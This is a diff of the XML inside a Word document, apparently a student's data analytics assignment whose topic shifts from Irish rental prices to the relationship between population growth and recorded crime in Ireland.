--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -816,74 +816,184 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">1 Data preparation and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">1 Data preparation and Visualization </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visualization </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve"> ---------------------------- 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:rPr>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ----------------------------</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 1</w:t>
+        <w:t>Data preparation and Visualization : (Graded out of 100)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rStyle w:val="hgkelc"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">erform appropriate EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - Early data analysis / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hgkelc"/>
           <w:b/>
           <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Exploratory data analysis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hgkelc"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (EDA)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hgkelc"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Method chosen and Insights.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:t>You must also rationalise justify and detail all the methods used to prepare the data for ML.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Appropriate visualizations must be used to engender insight into the dataset and to illustrate your final insights gained in your analysis. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="300"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>4.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="14"/>
+          <w:szCs w:val="14"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">All design and implementation of your visualizations must be justified and detailed in full. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Early Data Analysis/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Exploratory Data Analysis (EDA)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Merging all Datasets into only solid</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1129,39 +1239,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Abstract</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Abstract</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -1174,7 +1262,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The aim of this project is to explore the link between population trends and renting prices in Ireland. </w:t>
+        <w:t xml:space="preserve">The aim of this project is to explore the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1183,6 +1271,42 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>relationship</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> between population trends and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>recorded crimes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in Ireland. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>To achieve this goal, I</w:t>
       </w:r>
       <w:r>
@@ -1192,7 +1316,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> will be investigating how population growth, immigration, migration, and other population factors affect the cost of renting a home in Ireland.</w:t>
+        <w:t xml:space="preserve"> will be investigating </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the impact of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>population growth</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on crime rates.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1284,7 +1444,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Is there a relationship between population growth and renting prices in Ireland</w:t>
+        <w:t xml:space="preserve">Is there a relationship between population growth and </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1293,7 +1453,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in the last 15 years</w:t>
+        <w:t>recorded crimes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in Ireland</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the last </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> years</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1350,9 +1546,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> be used to predict future rent prices in </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> be used to predict future </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1360,9 +1555,17 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Ireland?</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>crime rate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ireland?</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1465,7 +1668,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">population trends and renting prices in Ireland. </w:t>
+        <w:t xml:space="preserve">population trends and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>recorded crime</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in Ireland. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1485,7 +1706,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The main source</w:t>
+        <w:t xml:space="preserve">The main source of these dataset </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1494,7 +1715,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>s</w:t>
+        <w:t>is</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1503,7 +1724,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> of these dataset </w:t>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1512,7 +1733,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>are</w:t>
+        <w:t>Central Statistics Office (CSO)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1521,16 +1742,54 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Central Statistics Office (CSO) and the Residential Tenancies Board (RTB).</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Once you have collected the data, you can use a variety of statistical methods to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>analyse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>To choose the best way to predict something, we are exploring and comparing different regression models. The models we are considering are multiple linear regression, lasso and ridge regularization, and decision tree regression.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1550,7 +1809,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Once you have collected the data, you can use a variety of statistical methods to </w:t>
+        <w:t>As d</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1559,17 +1818,19 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>analyse</w:t>
-      </w:r>
-      <w:r>
+        <w:t>ifferent regression models make different assumptions about the data. Comparing different models, I will find the one that produces the most accurate predictions for the dataset.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> it. </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1577,142 +1838,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>To choose the best way to predict something, we are exploring and comparing different regression models. The models we are considering are multiple linear regression, lasso and ridge regularization, and decision tree regression.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:t xml:space="preserve">I also will </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>use regression analysis to model the relationship between population growth and renting prices.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>As d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ifferent regression models make different assumptions about the data. Comparing different models, I will find the one that produces the most accurate predictions for the dataset.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I also will </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>use regression analysis to model the relationship between population growth and renting prices.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>dataset</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">show Estimated Immigration into Ireland since 1996, Estimated Population in Ireland since 2016 and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Average</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> renting price since 2007</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>, To improve the accuracy of my results, I will merge the three datasets into a unified dataset, retaining only data from 2016 to 2023.</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1740,6 +1887,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Data preparation and Visualization </w:t>
       </w:r>
     </w:p>
@@ -1850,15 +1998,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The dataset contains three variables:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>project will use 4 datasets:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1880,7 +2028,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Estimated Immigration into Ireland since 1996</w:t>
+        <w:t>CJQ01-recorded_crime_2002-2023.csv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1902,7 +2050,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Estimated Population in Ireland since 2016</w:t>
+        <w:t>PEA04-Estimated_Pupulation-2011-2023.csv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1924,7 +2072,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Average renting price since 2007</w:t>
+        <w:t>PEA07-Estimated_Pupulation-1996-2017.csv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2000,8 +2148,167 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> overall trends in immigration, population, and renting prices over time.</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> overall trends in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">population, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>as well as the overall situation of the crime rate and relation with the population trend.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Performing the EDA:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
